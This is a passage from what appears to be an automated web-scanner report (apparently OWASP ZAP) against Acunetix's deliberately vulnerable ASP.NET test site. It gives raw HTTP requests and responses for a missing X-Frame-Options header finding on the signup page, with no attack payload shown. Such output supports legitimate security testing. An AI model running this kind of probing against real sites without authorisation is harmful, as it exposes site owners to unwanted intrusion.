91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO%2FZZOlJz58
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the 